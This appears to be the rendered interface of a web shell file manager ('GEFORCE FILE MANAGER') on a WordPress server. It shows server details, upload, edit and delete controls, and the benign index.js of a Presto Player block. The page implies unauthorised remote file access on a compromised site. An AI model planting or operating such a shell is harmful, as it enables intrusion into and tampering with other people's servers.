[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
presto-player
/
src
/
admin
/
blocks
/
blocks
/
media-hub
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 block.json
404 B
SET
[ EDIT ]
|
[ DEL ]
📄 edit.js
6,044 B
SET
[ EDIT ]
|
[ DEL ]
📄 index.js
1,093 B
SET
[ EDIT ]
|
[ DEL ]
📄 save.js
257 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: index.js
/** * WordPress dependencies */ import { __ } from "@wordpress/i18n"; /** * Internal dependencies */ import edit from "./edit"; import save from "./save"; import metadata from "./block.json"; const { name } = metadata; export { metadata, name }; export const options = { usesContext: [ "presto-player/playlist-media-id", "presto-player/popup-media-id", ], providesContext: { "presto-player/playlist-media-id": "id", }, attributes: { id: { type: "number", }, }, icon: ( <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg" className="presto-block-icon" > <path d="M12 22C17.5228 22 22 17.5228 22 12C22 6.47715 17.5228 2 12 2C6.47715 2 2 6.47715 2 12C2 17.5228 6.47715 22 12 22Z" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round" /> <path d="M10 8L16 12L10 16V8Z" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round" /> </svg> ), edit, save, };